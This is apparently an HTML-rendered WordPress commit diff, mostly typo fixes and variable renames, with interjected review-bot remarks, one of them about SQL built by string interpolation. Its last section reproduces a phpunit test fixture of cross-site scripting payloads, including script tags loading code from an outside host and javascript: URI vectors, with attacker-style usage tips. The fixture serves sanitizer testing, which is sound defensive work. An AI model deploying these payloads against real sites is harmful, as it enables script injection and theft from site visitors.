<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/js/media/views/toolbar.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/js/media/views/toolbar.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -52,7 +52,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px"> },
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * @return {wp.media.view.Toolbar} Returns itsef to allow chaining
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * @return {wp.media.view.Toolbar} Returns itself to allow chaining
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> dispose: function() {
</span><span class="cx" style="display: block; padding: 0 10px"> if ( this.selection ) {
</span></span></pre></div>
<a id="trunksrcwpadmincsslisttablescss"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-admin/css/list-tables.css</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-admin/css/list-tables.css 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-admin/css/list-tables.css 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -904,7 +904,7 @@
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> tr.inline-edit-row td {
</span><span class="cx" style="display: block; padding: 0 10px"> padding: 0;
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- /* Prevents the focus style on .inline-edit-wrapper from being cutted-off */
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ /* Prevents the focus style on .inline-edit-wrapper from being cut-off */
</ins><span class="cx" style="display: block; padding: 0 10px"> position: relative;
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span></span></pre></div>
<a id="trunksrcwpcontentthemestwentyfourteenincfeaturedcontentphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-content/themes/twentyfourteen/inc/featured-content.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-content/themes/twentyfourteen/inc/featured-content.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-content/themes/twentyfourteen/inc/featured-content.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -179,7 +179,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Return an array with IDs of posts maked as sticky.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Return an array with IDs of posts marked as sticky.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @since Twenty Fourteen 1.0
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span></span></pre></div>
<a id="trunksrcwpcontentthemestwentyseventeenassetscsscolorsdarkcss"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-content/themes/twentyseventeen/assets/css/colors-dark.css</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-content/themes/twentyseventeen/assets/css/colors-dark.css 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-content/themes/twentyseventeen/assets/css/colors-dark.css 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -126,8 +126,8 @@
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .widget .widget-title a:hover,
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .widget ul li a:focus,
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .widget ul li a:hover {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- -webkit-box-shadow: inset 0 0 0 rgba(255, 255, 255, 0), 0 3px 0 rgba(255, 255, 255, 1); /* Equivalant to #fff */
- box-shadow: inset 0 0 0 rgba(255, 255, 255, 0), 0 3px 0 rgba(255, 255, 255, 1); /* Equivalant to #fff */
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ -webkit-box-shadow: inset 0 0 0 rgba(255, 255, 255, 0), 0 3px 0 rgba(255, 255, 255, 1); /* Equivalent to #fff */
+ box-shadow: inset 0 0 0 rgba(255, 255, 255, 0), 0 3px 0 rgba(255, 255, 255, 1); /* Equivalent to #fff */
</ins><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .entry-content a,
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -137,8 +137,8 @@
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .site-footer .widget-area a,
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .posts-navigation a,
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .widget_authors a strong {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- -webkit-box-shadow: inset 0 -1px 0 rgba(240, 240, 240, 1); /* Equivalant to #f0f0f0 */
- box-shadow: inset 0 -1px 0 rgba(240, 240, 240, 1); /* Equivalant to #f0f0f0 */
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ -webkit-box-shadow: inset 0 -1px 0 rgba(240, 240, 240, 1); /* Equivalent to #f0f0f0 */
+ box-shadow: inset 0 -1px 0 rgba(240, 240, 240, 1); /* Equivalent to #f0f0f0 */
</ins><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> body.colors-dark,
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -474,8 +474,8 @@
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .widget ul li a,
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .site-footer .widget-area ul li a,
</span><span class="cx" style="display: block; padding: 0 10px"> .colors-dark .site-info a {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- -webkit-box-shadow: inset 0 -1px 0 rgba(34, 34, 34, 1); /* Equivalant to #222 */
- box-shadow: inset 0 -1px 0 rgba(34, 34, 34, 1); /* Equivalant to #222 */
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ -webkit-box-shadow: inset 0 -1px 0 rgba(34, 34, 34, 1); /* Equivalent to #222 */
+ box-shadow: inset 0 -1px 0 rgba(34, 34, 34, 1); /* Equivalent to #222 */
</ins><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /* Fixes linked images */
</span></span></pre></div>
<a id="trunksrcwpcontentthemestwentytwelveincblockpatternsphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-content/themes/twentytwelve/inc/block-patterns.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-content/themes/twentytwelve/inc/block-patterns.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-content/themes/twentytwelve/inc/block-patterns.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -100,7 +100,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> <p class="has-drop-cap">' . esc_html__( 'Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast of the Semantics, a large language ocean. A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth.', 'twentytwelve' ) . '</p>
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- /wp:paragraph -->
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- wp:paragraph -->
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- <p>' . esc_html__( 'The Big Oxmox advised her not to do so, because there were thousands of bad Commas, wild Question Marks and devious Semikoli, but the Little Blind Text didn’t listen. She packed her seven versalia, put her initial into the belt and made herself on the way. When she reached the first hills of the Italic Mountains, she had a last view back on the skyline of her hometown Bookmarksgrove, the headline of Alphabet Village and the subline of her own road, the Line Lane. Pityful a rethoric question ran over her cheek, then.', 'twentytwelve' ) . '</p>
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ <p>' . esc_html__( 'The Big Oxmox advised her not to do so, because there were thousands of bad Commas, wild Question Marks and devious Semikoli, but the Little Blind Text didn’t listen. She packed her seven versalia, put her initial into the belt and made herself on the way. When she reached the first hills of the Italic Mountains, she had a last view back on the skyline of her hometown Bookmarksgrove, the headline of Alphabet Village and the subline of her own road, the Line Lane. Pityful a rhetoric question ran over her cheek, then.', 'twentytwelve' ) . '</p>
</ins><span class="cx" style="display: block; padding: 0 10px"> <!-- /wp:paragraph -->
</span><span class="cx" style="display: block; padding: 0 10px"> <!-- wp:paragraph -->
</span><span class="cx" style="display: block; padding: 0 10px"> <p>' . esc_html__( 'It is a paradisematic country, in which roasted parts of sentences fly into your mouth. Even the all-powerful Pointing has no control about the blind texts it is an almost unorthographic life One day however a small line of blind text by the name of Lorem Ipsum decided to leave for the far World of Grammar. Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts. Separated they live in Bookmarksgrove right at the coast of the Semantics, a large language ocean. A small river named Duden flows by their place and supplies it with the necessary regelialia. It is a paradisematic country, in which roasted parts of sentences fly into your mouth.', 'twentytwelve' ) . '</p>
</span></span></pre></div>
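Review bot: Changing the text passed to `esc_html__()` in this hunk alters a translatable source string, so existing `twentytwelve` translations of this paragraph will presumably stop matching until translators update them. The correction is also partial: `Pityful` in the same sentence is left as is, so a later fix would change the string a second time. If the string is to change at all, correct both words in one pass (`Pitiful a rhetoric question ran over her cheek, then.`); otherwise leave the placeholder text untouched. The enclosing pattern definition starts and ends outside the hunk.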
<a id="trunksrcwpcontentthemestwentytwentyassetsjsindexjs"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-content/themes/twentytwenty/assets/js/index.js</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-content/themes/twentytwenty/assets/js/index.js 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-content/themes/twentytwenty/assets/js/index.js 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -331,7 +331,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> } );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-}; // twentytwenty.instrinsicRatioVideos
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+}; // twentytwenty.intrinsicRatioVideos
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /* -----------------------------------------------------------------------------------------------
</span><span class="cx" style="display: block; padding: 0 10px"> Modal Menu
</span></span></pre></div>
<a id="trunksrcwpcontentthemestwentytwentyoneassetssass06componentsheaderscss"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -173,7 +173,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> margin-top: calc(0px - var(--button--padding-vertical) + (0.25 * var(--global--spacing-unit)));
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> #primary-mobile-menu {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // The 4.5px here is to offset the icon size horizontallly
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // The 4.5px here is to offset the icon size horizontally
</ins><span class="cx" style="display: block; padding: 0 10px"> // (the icon's width is larger than the path's width and has extra space on the sides).
</span><span class="cx" style="display: block; padding: 0 10px"> padding-left: calc(var(--global--spacing-horizontal) * 0.6 - 4.5px);
</span><span class="cx" style="display: block; padding: 0 10px"> padding-right: calc(var(--global--spacing-horizontal) * 0.6 - 4.5px);
</span></span></pre></div>
<a id="trunksrcwpincludesclasswpthemejsonphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-includes/class-wp-theme-json.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-includes/class-wp-theme-json.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-includes/class-wp-theme-json.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -2893,7 +2893,7 @@
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * Returns the default slugs for all the presets in an associative array
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * whose keys are the preset paths and the leafs is the list of slugs.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * whose keys are the preset paths and the leaves is the list of slugs.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * For example:
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span></span></pre></div>
<a id="trunksrcwpincludesembedphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-includes/embed.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-includes/embed.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-includes/embed.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -244,7 +244,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $embed = $wp_embed->autoembed( sprintf( 'https://youtube.com/watch?v=%s', urlencode( $matches[2] ) ) );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Filters the YoutTube embed output.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Filters the YouTube embed output.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @since 4.0.0
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span></span></pre></div>
<a id="trunksrcwpincludesfunctionsphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-includes/functions.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-includes/functions.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-includes/functions.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -2270,7 +2270,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> * PHP has issues with Windows ACL's for determine if a
</span><span class="cx" style="display: block; padding: 0 10px"> * directory is writable or not, this works around them by
</span><span class="cx" style="display: block; padding: 0 10px"> * checking the ability to open files rather than relying
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * upon PHP to interprate the OS ACL.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * upon PHP to interpret the OS ACL.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @since 2.8.0
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span></span></pre></div>
<a id="trunksrcwpincludeshtmlapiclasswphtmltagprocessorphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/src/wp-includes/html-api/class-wp-html-tag-processor.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/src/wp-includes/html-api/class-wp-html-tag-processor.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/src/wp-includes/html-api/class-wp-html-tag-processor.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -2071,7 +2071,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /*
</span><span class="cx" style="display: block; padding: 0 10px"> * Purge updates if there are too many. The actual count isn't
</span><span class="cx" style="display: block; padding: 0 10px"> * scientific, but a few values from 100 to a few thousand were
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * tests to find a practially-useful limit.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * tests to find a practically-useful limit.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * If the update queue grows too big, then the Tag Processor
</span><span class="cx" style="display: block; padding: 0 10px"> * will spend more time iterating through them and lose the
</span></span></pre></div>
<a id="trunksrcwpincludesmsdeprecatedphp"></a>
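--- a/trunk/src/wp-includes/ms-deprecated.php
+++ b/trunk/src/wp-includes/ms-deprecated.php
@@ -145,7 +145,7 @@
 }
 
 /**
- * Deprecated functionality to determin if the current site is the main site.
+ * Deprecated functionality to determine if the current site is the main site.
 *
 * @since MU (3.0.0)
 * @deprecated 3.0.0 Use is_main_site()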
<a id="trunksrcwpincludesnavmenutemplatephp"></a>
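--- a/trunk/src/wp-includes/nav-menu-template.php
+++ b/trunk/src/wp-includes/nav-menu-template.php
@@ -341,9 +341,9 @@
 if ( is_array( $terms ) ) {
 $possible_object_parents = array_merge( $possible_object_parents, $terms );
 $term_to_ancestor = array();
- foreach ( (array) $term_hierarchy as $anc => $descs ) {
- foreach ( (array) $descs as $desc ) {
- $term_to_ancestor[ $desc ] = $anc;
+ foreach ( (array) $term_hierarchy as $ancestor => $descendents ) {
+ foreach ( (array) $descendents as $desc ) {
+ $term_to_ancestor[ $desc ] = $ancestor;
 }
 }
 
@@ -365,9 +365,9 @@
 } elseif ( ! empty( $queried_object->taxonomy ) && is_taxonomy_hierarchical( $queried_object->taxonomy ) ) {
 $term_hierarchy = _get_term_hierarchy( $queried_object->taxonomy );
 $term_to_ancestor = array();
- foreach ( (array) $term_hierarchy as $anc => $descs ) {
- foreach ( (array) $descs as $desc ) {
- $term_to_ancestor[ $desc ] = $anc;
+ foreach ( (array) $term_hierarchy as $ancestor => $descendents ) {
+ foreach ( (array) $descendents as $desc ) {
+ $term_to_ancestor[ $desc ] = $ancestor;
 }
 }
 $desc = $queried_object->term_id;
@@ -430,13 +430,13 @@
 ) {
 $classes[] = 'current-menu-item';
 $menu_items[ $key ]->current = true;
- $_anc_id = (int) $menu_item->db_id;
+ $ancestor_id = (int) $menu_item->db_id;
 
 while (
- ( $_anc_id = (int) get_post_meta( $_anc_id, '_menu_item_menu_item_parent', true ) )
- && ! in_array( $_anc_id, $active_ancestor_item_ids, true )
+ ( $ancestor_id = (int) get_post_meta( $ancestor_id, '_menu_item_menu_item_parent', true ) )
+ && ! in_array( $ancestor_id, $active_ancestor_item_ids, true )
 ) {
- $active_ancestor_item_ids[] = $_anc_id;
+ $active_ancestor_item_ids[] = $ancestor_id;
 }
 
 if ( 'post_type' === $menu_item->type && 'page' === $menu_item->object ) {
@@ -457,13 +457,13 @@
 ) {
 $classes[] = 'current-menu-item';
 $menu_items[ $key ]->current = true;
- $_anc_id = (int) $menu_item->db_id;
+ $ancestor_id = (int) $menu_item->db_id;
 
 while (
- ( $_anc_id = (int) get_post_meta( $_anc_id, '_menu_item_menu_item_parent', true ) )
- && ! in_array( $_anc_id, $active_ancestor_item_ids, true )
+ ( $ancestor_id = (int) get_post_meta( $ancestor_id, '_menu_item_menu_item_parent', true ) )
+ && ! in_array( $ancestor_id, $active_ancestor_item_ids, true )
 ) {
- $active_ancestor_item_ids[] = $_anc_id;
+ $active_ancestor_item_ids[] = $ancestor_id;
 }
 
 $active_parent_item_ids[] = (int) $menu_item->menu_item_parent;
@@ -494,13 +494,13 @@
 if ( $raw_item_url && in_array( $item_url, $matches, true ) ) {
 $classes[] = 'current-menu-item';
 $menu_items[ $key ]->current = true;
- $_anc_id = (int) $menu_item->db_id;
+ $ancestor_id = (int) $menu_item->db_id;
 
 while (
- ( $_anc_id = (int) get_post_meta( $_anc_id, '_menu_item_menu_item_parent', true ) )
- && ! in_array( $_anc_id, $active_ancestor_item_ids, true )
+ ( $ancestor_id = (int) get_post_meta( $ancestor_id, '_menu_item_menu_item_parent', true ) )
+ && ! in_array( $ancestor_id, $active_ancestor_item_ids, true )
 ) {
- $active_ancestor_item_ids[] = $_anc_id;
+ $active_ancestor_item_ids[] = $ancestor_id;
 }
 
 if ( in_array( home_url(), array( untrailingslashit( $current_url ), untrailingslashit( $_indexless_current ) ), true ) ) {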
<a id="trunksrcwpincludespostphp"></a>
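--- a/trunk/src/wp-includes/post.php
+++ b/trunk/src/wp-includes/post.php
@@ -3403,7 +3403,7 @@
 $post_mime_types = array_map( 'trim', explode( ',', $post_mime_types ) );
 }
 
- $wheres = array();
+ $where_clauses = array();
 
 foreach ( (array) $post_mime_types as $mime_type ) {
 $mime_type = preg_replace( '/\s/', '', $mime_type );
@@ -3431,14 +3431,14 @@
 }
 
 if ( str_contains( $mime_pattern, '%' ) ) {
- $wheres[] = empty( $table_alias ) ? "post_mime_type LIKE '$mime_pattern'" : "$table_alias.post_mime_type LIKE '$mime_pattern'";
+ $where_clauses[] = empty( $table_alias ) ? "post_mime_type LIKE '$mime_pattern'" : "$table_alias.post_mime_type LIKE '$mime_pattern'";
 } else {
- $wheres[] = empty( $table_alias ) ? "post_mime_type = '$mime_pattern'" : "$table_alias.post_mime_type = '$mime_pattern'";
+ $where_clauses[] = empty( $table_alias ) ? "post_mime_type = '$mime_pattern'" : "$table_alias.post_mime_type = '$mime_pattern'";
 }
 }
 
- if ( ! empty( $wheres ) ) {
- $where = ' AND (' . implode( ' OR ', $wheres ) . ') ';
+ if ( ! empty( $where_clauses ) ) {
+ $where = ' AND (' . implode( ' OR ', $where_clauses ) . ') ';
 }
 
 return $where;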
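Review bot: The renamed `$where_clauses[]` lines in the second hunk still build the SQL fragment by interpolating `$mime_pattern` and `$table_alias` directly into the string, and nothing visible in either hunk escapes or prepares those values. The only filtering shown is the whitespace strip on `$mime_type` in the first hunk; whatever restricts `$mime_pattern` sits in the lines between the two hunks, and the function itself begins before them. I would record the assumption next to the concatenation with a comment above the `if ( str_contains( $mime_pattern, '%' ) )` branch, for example `// $mime_pattern is reduced to a restricted character set above; $table_alias must be a trusted identifier, never request input.` If that does not hold for `$table_alias`, it should be validated against an identifier pattern before it is used here.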
<a id="trunksrcwpincludesthemephp"></a>
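--- a/trunk/src/wp-includes/theme.php
+++ b/trunk/src/wp-includes/theme.php
@@ -3562,7 +3562,7 @@
 $changeset_uuid = false;
 
 /*
- * Set initially fo false since defaults to true for back-compat;
+ * Set initially to false since defaults to true for back-compat;
 * can be overridden via the customize_changeset_branching filter.
 */
 $branching = false;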
<a id="trunktestsphpunitdataformattingxssAttacksxml"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/data/formatting/xssAttacks.xml</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/data/formatting/xssAttacks.xml 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/data/formatting/xssAttacks.xml 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -1,433 +1,433 @@
</span><span class="cx" style="display: block; padding: 0 10px"> <?xml version="1.0"?>
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-<xss>
- <attack>
- <name>XSS Locator</name>
- <code>';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}</code>
- <desc>Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. You'll need to replace the "&" with "%26" if you are submitting this XSS string via HTTP GET or it will be ignored and everything after it will be interpreted as another variable. Tip: If you're in a rush and need to quickly check a page, often times injecting the deprecated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably.</desc>
- <label>Basic XSS Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>XSS Quick Test</name>
- <code>'';!--"<XSS>=&{()}</code>
- <desc>If you don't have much space, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS versus &lt;XSS to see if it is vulnerable.</desc>
- <label>Basic XSS Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>SCRIPT w/Alert()</name>
- <code><SCRIPT>alert('XSS')</SCRIPT></code>
- <desc>Basic injection attack</desc>
- <label>Basic XSS Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>SCRIPT w/Source File</name>
- <code><SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT></code>
- <desc>No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here).</desc>
- <label>Basic XSS Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>SCRIPT w/Char Code</name>
- <code><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></code>
- <desc>Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up.</desc>
- <label>Basic XSS Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>BASE</name>
- <code><BASE HREF="javascript:alert('XSS');//"></code>
- <desc>Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="ns">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>BGSOUND</name>
- <code><BGSOUND SRC="javascript:alert('XSS');"></code>
- <desc>BGSOUND</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="ns">IE6.0</span>|<span class="ns">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>BODY background-image</name>
- <code><BODY BACKGROUND="javascript:alert('XSS');"></code>
- <desc>BODY image</desc>
- <label>HTML Element Attacks</label>
- <browser>Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="ns">NS8.1-G</span>|<span class="ns">FF1.5</span>] [<span class="s">O8.54</span>]</browser>
- </attack>
- <attack>
- <name>BODY ONLOAD</name>
- <code><BODY ONLOAD=alert('XSS')></code>
